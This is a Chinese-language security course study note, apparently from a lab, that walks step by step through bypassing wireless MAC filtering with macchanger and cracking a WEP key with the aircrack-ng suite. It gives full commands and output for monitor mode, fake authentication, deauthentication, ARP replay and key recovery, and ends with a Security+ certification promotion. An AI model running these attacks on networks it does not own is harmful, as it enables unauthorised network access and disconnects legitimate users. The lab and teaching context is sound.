安全牛学习笔记Mac地址绑定攻击

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全牛学习笔记Mac地址绑定攻击相关的知识,希望对你有一定的参考价值。

MAC地址绑定攻击
MAC绑定                          
管理员误以为MAC绑定是一种安全机制
限制可以关联的客户端MAC地址                                                                  
准备AP                            
    AP基本配置                    
    Open认证                      
    开启无线过滤                 
修改MAC地址绕过过滤

[email protected]:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 08:00:27:fd:1c:9d
          inet addr:192.168.20.8  Bcast:192.168.20.255  Mask:255.255.255.0
          inet6 addr:  fe80::a00:27ff:fefd:1c9d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST MTU:1500  MetricL:1
          Rx packets:0 errors:0 dropped:0 overruns:0 frame:0
          Tx packets:50 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          Rx bytes:1200 (0.0 KiB)   TX bytes:1200 (0.0 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1 Mask:255.0.0.0
          inet addr. ::1/128 Scope:Host
          UP LOOKBACK RUNNING  MTU:65536 MetricL:1
          Rx packets:20 errors:0 dropped:0 overruns:0 frame:0
          Tx packets:20 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          Rx bytes:1200 (1.1 KiB)   TX bytes:1200 (1.1 KiB)

wlan2     Link encap:Ethernet  HWaddr 08:57:00:0c:96:68
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          Rx packets:20 errors:0 dropped:0 overruns:0 frame:0
          Tx packets:20 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          Rx bytes:0 (0.0 B)   TX bytes:0 (0.0 B)

[email protected]:~# service network-manager stop

[email protected]:~# airmon-ng check kill
Killing these processes:

  PID Name
  718 dnclinet
  931 wpa_supplicant

[email protected]:~# airmon-ng start wlan2
No interfering processes found
PHY     Interface       Driver            Chipest

phy0    wlan2           ath9k_htc        Atheros Communications, Inc, AR9271 802.11n
                (mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)
                (mac80211 station mode vif disabled for [phy0]wlan2)

[email protected]:~# iwconfig
eth0      no wireless extensions

wlan2mon  IEEE 802.11bgn  Mode:Monitor Frequency:2.57 GHz   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off    Fragment thr:off
          Power Management:off

lo        no wireless extensions

[email protected]:~# iwlist wlan2mon channel
wlan2     13 channels in total; avaiable frequencies :
          Channel 01 : 2.412 GHz
          Channel 02 : 2.417 GHz
          Channel 03 : 2.422 GHz
          Channel 04 : 2.427 GHz
          Channel 05 : 2.432 GHz
          Channel 06 : 2.437 GHz
          Channel 07 : 2.442 GHz
          Channel 08 : 2.447 GHz
          Channel 09 : 2.452 GHz
          Channel 10 : 2.457 GHz
          Channel 11 : 2.462 GHz
          Channel 12 : 2.467 GHz
          Channel 13 : 2.472 GHz
          Current Frequency:2.457 GHz (Channel 10)

[email protected]:~# iw dev wlan2mon set channel 11    //启用11信道

[email protected]:~# iwlist wlan2mon channel
wlan2     13 channels in total; avaiable frequencies :
          Channel 01 : 2.412 GHz
          Channel 02 : 2.417 GHz
          Channel 03 : 2.422 GHz
          Channel 04 : 2.427 GHz
          Channel 05 : 2.432 GHz
          Channel 06 : 2.437 GHz
          Channel 07 : 2.442 GHz
          Channel 08 : 2.447 GHz
          Channel 09 : 2.452 GHz
          Channel 10 : 2.457 GHz
          Channel 11 : 2.462 GHz
          Channel 12 : 2.467 GHz
          Channel 13 : 2.472 GHz
          Current Frequency:2.462 GHz (Channel 11)

[email protected]:~# airmon-ng wlan2mon          //侦听附近所有的AP和客户

[email protected]:~# airmon-ug stop wlan2mon

[email protected]:~# airmon-ng start wlan2 11       //直接启用11信道进行监听

[email protected]:~# iwlist wlan2mon channel
wlan2     13 channels in total; avaiable frequencies :
          Channel 01 : 2.412 GHz
          Channel 02 : 2.417 GHz
          Channel 03 : 2.422 GHz
          Channel 04 : 2.427 GHz
          Channel 05 : 2.432 GHz
          Channel 06 : 2.437 GHz
          Channel 07 : 2.442 GHz
          Channel 08 : 2.447 GHz
          Channel 09 : 2.452 GHz
          Channel 10 : 2.457 GHz
          Channel 11 : 2.462 GHz
          Channel 12 : 2.467 GHz
          Channel 13 : 2.472 GHz
          Current Frequency:2.462 GHz (Channel 11)

[email protected]:~# airodump-ng wlan2mon         //侦听附近所有的AP和客户

------------------------------------------------------------

[email protected]:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 08:00:27:fd:1c:9d
          inet addr:192.168.20.8  Bcast:192.168.20.255  Mask:255.255.255.0
          inet6 addr:  fe80::a00:27ff:fefd:1c9d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST MTU:1500  MetricL:1
          Rx packets:0 errors:0 dropped:0 overruns:0 frame:0
          Tx packets:50 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          Rx bytes:1200 (0.0 KiB)   TX bytes:1200 (0.0 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1 Mask:255.0.0.0
          inet addr. ::1/128 Scope:Host
          UP LOOKBACK RUNNING  MTU:65536 MetricL:1
          Rx packets:20 errors:0 dropped:0 overruns:0 frame:0
          Tx packets:20 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          Rx bytes:1200 (1.1 KiB)   TX bytes:1200 (1.1 KiB)

wlan2     Link encap:Ethernet  HWaddr 08:57:00:0c:96:68
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          Rx packets:20 errors:0 dropped:0 overruns:0 frame:0
          Tx packets:20 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          Rx bytes:0 (0.0 B)   TX bytes:0 (0.0 B)

[email protected]:~# airmon-ng start wlan2 11       //直接启用11信道进行监听
Found 2 processes that could cause trouble.
If airodump, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

  PID Name
 1944 avahi-deamon
 1945 avahi-deamon

PHY     Interface       Driver            Chipest

phy0    wlan2           ath9k_htc        Atheros Communications, Inc, AR9271 802.11n
                (mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)
                (mac80211 station mode vif disabled for [phy0]wlan2)

[email protected]:~# iwconfig
eth0      no wireless extensions

wlan2mon  IEEE 802.11bgn  Mode:Monitor Frequency:2.57 GHz   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off    Fragment thr:off
          Power Management:off

lo        no wireless extensions

[email protected]:~# iwlist wlan2mon channel
wlan2     13 channels in total; avaiable frequencies :
          Channel 01 : 2.412 GHz
          Channel 02 : 2.417 GHz
          Channel 03 : 2.422 GHz
          Channel 04 : 2.427 GHz
          Channel 05 : 2.432 GHz
          Channel 06 : 2.437 GHz
          Channel 07 : 2.442 GHz
          Channel 08 : 2.447 GHz
          Channel 09 : 2.452 GHz
          Channel 10 : 2.457 GHz
          Channel 11 : 2.462 GHz
          Channel 12 : 2.467 GHz
          Channel 13 : 2.472 GHz
          Current Frequency:2.462 GHz (Channel 11)

[email protected]:~# airodump-ng wlan2mon -c 11          //侦听信道11附近所有的AP和客户

[email protected]:~# airodump-ng wlan2mon -c 11 --bssid EC:26:CA:DC:29:B6

[email protected]:~# ifconfig wlan0 down

[email protected]:~# macchanger -m 68:3E:34:30:0F:AA wlan0
Current MAC:   c8:3a:35:ca:46:91 (Tenda Technology Co., Ltd.)
Permanent MAC: c8:3a:35:ca:46:91 (Tenda Technology Co., Ltd.)
New MAC:       68:3e:34:30:0f:aa (unknown)

[email protected]:~# ifconfig wlan0 up

[email protected]:~# ifconfig

[email protected]:~# airodump-ng wlan2mon -c 11 --bssid 68:3e:34:30:0f:aa

WEP攻击
WEP共享密钥破解                                            
WEP密码破解原理                                             
    IV并非完全随机                                         
    每224个包可能出现一次IV重用                             
   收集大量IV之后找到相同IV及其对应密码文,分析得出共享密码
ARP回包中包含IV                                            
IV足够多的情况下,任何复杂程度的wep密码都可以被破解  

[email protected]:~# airodump-ng wlan2mon

[email protected]:~# airodump-ng -c 11 --bssid EC:26:CA:DC:29:B6 -w wep wlan2mon

WEP共享密钥破解                
启动monitor模式                
启动抓包并保存抓包             
Deauthentication抓包XOR文件    
利用XOR文件与AP建立关联        
执行ARP重放                    
Deauthenticiation触发ARP数据包 
收集足够DATA之后破解密码

[email protected]:~# ls
wep-01.csv    wep-01.kismet.csv    wep-01-EC-26-CA-DC-29-86.xor    wep-01.kisment.netxml

[email protected]:~# cat wep-01-EC-26-CA-DC-29-86.xor    //查看的是一个密文

[email protected]:~# aireplay-ng --help

  Aireplay-ng 1.2 rc2 - (C) 2006-2014 Thomas d‘Otreppe
  http://www.aircrack-ng.org

  usage: aireplay-ng <options> <replay interface>

  Filter options:

      -b bssid  : MAC address, Access Point
      -d dmac   : MAC address, Destination
      -s smac   : MAC address, Source
      -m len    : minimum packet length
      -n len    : maximum packet length
      -u type   : frame control, type    field
      -v subt   : frame control, subtype field
      -t tods   : frame control, To      DS bit
      -f fromds : frame control, From    DS bit
      -w iswep  : frame control, WEP     bit
      -D        : disable AP detection

  Replay options:

      -x nbpps  : number of packets per second
      -p fctrl  : set frame control word (hex)
      -a bssid  : set Access Point MAC address
      -c dmac   : set Destination  MAC address
      -h smac   : set Source       MAC address
      -g value  : change ring buffer size (default: 8)
      -F        : choose first matching packet

      Fakeauth attack options:

      -e essid  : set target AP SSID
      -o npckts : number of packets per burst (0=auto, default: 1)
      -q sec    : seconds between keep-alives
      -Q        : send reassociation requests
      -y prga   : keystream for shared key auth
      -T n      : exit after retry fake auth request n time

      Arp Replay attack options:

      -j        : inject FromDS packets

      Fragmentation attack options:

      -k IP     : set destination IP in fragments
      -l IP     : set source IP in fragments

      Test attack options:

      -B        : activates the bitrate test

  Source options:

      -i iface  : capture packets from this interface
      -r file   : extract packets from this pcap file

  Miscellaneous options:

      -R                    : disable /dev/rtc usage
      --ignore-negative-one : if the interface‘s channel can‘t be determined,
                              ignore the mismatch, needed for unpatched cfg80211

  Attack modes (numbers can still be used):

      --deauth      count : deauthenticate 1 or all stations (-0)
      --fakeauth    delay : fake authentication with AP (-1)
      --interactive       : interactive frame selection (-2)
      --arpreplay         : standard ARP-request replay (-3)
      --chopchop          : decrypt/chopchop WEP packet (-4)
      --fragment          : generates valid keystream   (-5)
      --caffe-latte       : query a client for new IVs  (-6)
      --cfrag             : fragments against a client  (-7)
      --migmode           : attacks WPA migration mode  (-8)
      --test              : tests injection and quality (-9)

      --help              : Displays this usage screen
[email protected]:~# aireplay-ng -1 60 -e kifi -y wep-01-EC-26-CA-DC-29-86.xor -a EC:26:CA:DC:29:B6 -h 08-57-00-0C-96-68 wlan2mon  
//第一种注入方式,每60秒发一次authentication进行身份认证,关联目标wifibSSID,密钥流,AP,本机网卡的manage地址
21:44:21  Waiting for beacon frame (BSSID: EC:26:CA:DC:29:B6) on channel

21:44:21  Sending Authentication Request (Shared Key) [ACK]
21:44:21  Authentication 1/2 successful
21:44:21  Sending encrypted challege. [ACK]
21:44:21  Authentication 2/2 successful
21:44:21  Sending Association Request [ACK]
21:44:21  Association successful :-) (AID: 1)

21:44:36  Sending keep-alive packet [ACK]
21:44:51  Sending keep-alive packet [ACK]
21:45:06  Sending Authentication Request (Shared Key) [ACK]
21:45:21  Authentication 1/2 successful
21:45:21  Sending encrypted challege. [ACK]
21:45:21  Authentication 2/2 successful
21:45:21  Sending Association Request [ACK]
21:45:21  Association successful :-) (AID: 1)

21:45:36  Sending keep-alive packet [ACK]
21:45:51  Sending keep-alive packet [ACK]
21:46:06  Sending keep-alive packet [ACK]
21:45:06  Sending Authentication Request (Shared Key) [ACK]
21:47:21  Authentication 1/2 successful
21:47:21  Sending encrypted challege. [ACK]
21:47:21  Authentication 2/2 successful
21:47:21  Sending Association Request [ACK]
21:47:21  Association successful :-) (AID: 1)

21:47:36  Sending keep-alive packet [ACK]

[email protected]:~# aireplay-ng -0 1 -a EC:26:CA:DC:29:B6 -C 68:3E:34:30:0F:AA wlan2mon   //解除关联关系
21:54:29  Waiting for beacon frame (BSSID: EC:26:CA:DC:29:B6) on channel 11
21:54:29  Sending 64 directed DeAuth. STMAC: [68:3E:34:30:0F:AA] [ 2|64 ACKs]

[email protected]:~# aireplay-ng -0 10 -a EC:26:CA:DC:29:B6 -C 68:3E:34:30:0F:AA wlan2mon

[email protected]:~# aireplay-ng -3 -b EC:26:CA:DC:29:B6 -h 08:57:00:0C:96:68 wlan2mon
21:42:17 Waiting for beacon frame (BSSID: Ec:26:CA:DC:29:B6) on channel 11
Saving ARP requests in replay_arp-1105-214217.cap
you shoule also start airodump-ng to capture relies.
Read 20814 packets (got 0 ARP request and 0 ACKs),sent 0 packets...(0 pps)

[email protected]:~# aireplay-ng -0 2 -a EC:26:CA:DC:29:B6 -c 68:3E:34:30:0F:AA wlanmon  //把客户端打掉然后重连

[email protected]:~# ls
wep-01.csv    wep-01.kismet.csv    wep-01-EC-26-CA-DC-29-86.xor    wep-01.kisment.netxml    replay_arp-1105-214217.cap    wep-01.cap

[email protected]:~# wireshark wep-01.cap

[email protected]:~# aircrack-ng wep-01.cap

                                   Aircrack-ng 1.2 rc2

    KB    depth  bytes(vote)
     0    0/  2  31(247040) 80(195072) EO(193280) 51(193024) 0A(192000) 4B(190464) 85(190464) BE(190208) 78(189696) EF(189696) 2C(189184)
     1    1/  2  77(198912) A1(195584) 2F(195816) 95(193024) E6(192512) B5(190976) 1F(189696) 60(189184) AE(188672) 7A(188416) BB(188426)
     2    8/  2  9B(189184) 3A(188672) D7(188672) EC(188672) 6C(188416) 25(187648) FE(187648) 9A(186880) E4(186880) BB(186624) 27(185856)
     3    0/  4  A2(240896) 4E(190464) A5(189952) FB(189184) DB(188928) 18(188672) 12(188160) 28(187648) 42(187136) F1(186880) 0E(186624)
     4   91/  4  E7(178944) 74(178688) AC(178688) 5F(178432) 65(178432) 90(178432) C6(178176) 3E(177920) 42(177920) B7(177920) BA(177920)

       KEY FOUND! [ 31:32:33:34:35:36:37:38:39:30:31:32:33 ] (ASCII: 1234567890123 )
          Decrypted correctly: 100%

FAKE AUTHENTICATION                                                        
WEP破解全部需要首先伪造认证,以便于AP进行正常通信                          
不产生ARP数据包                                                            
aireplay-ng -1 0 -e kifi -a <AP MAC> -h <Your MAC> <interface>             
aireplay-ng -1 60 -0 1 -q 10 -e <ESSID> -a <AP MAC> -h <Your MAC><interface>
    每60000秒发送reauthenticiation                                          
    -o 1 每次身份认证只发一组认证数据                                       
    -q 10 每10秒发keep-live帧 
FAKE AUTHENTICATION                    
某些AP验证客户端MAC地址OUI (前三个字节)
MAC地址过滤                            
Denied (Code 1) is WPA in use           
    WPA/WPA2不支持Fake authentication  
使用真实MAC地址                        
物理靠近AP                             
侦听信道正确
FAKE AUTHENTICATION排错                
物理足够接近被攻击者                   
与被攻击者使用相同无线标准b、n、g      
客户端可能拒绝广播帧,建议制定客户端 

ARP重放                                                  
侦听正常的ARP包并重放给AP                                
AP回包中包含大量弱IV                                                                                              
    

aireplay-ng -3 -b <AP MAC> -h <Source MAC><interface name>
    -h合法客户端/供给者MAC                               
Airodump-ng data字段                                      
    64bit密钥: 25万                                       
    128bit密钥: 150万

WEP破解              
Airecrack-ng wep.cap 

该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂

Security+认证为什么是互联网+时代最火爆的认证?


      牛妹先给大家介绍一下Security+


        Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。

       通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。

Security+认证如此火爆的原因?  

       原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。

      目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。

       原因二: IT运维人员工作与翻身的利器。

       在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。

        原因三:接地气、国际范儿、考试方便、费用适中!

CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。

        在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。

本文出自 “11662938” 博客,请务必保留此出处http://11672938.blog.51cto.com/11662938/1967652

以上是关于安全牛学习笔记Mac地址绑定攻击的主要内容,如果未能解决你的问题,请参考以下文章

安全牛学习笔记WPA攻击

安全牛学习笔记DNS放大攻击

安全牛学习笔记NTP放大攻击

安全牛学习笔记SNMP放大攻击

安全牛学习笔记Smurf攻击Sockstress

安全牛学习笔记SSLTLS中间人攻击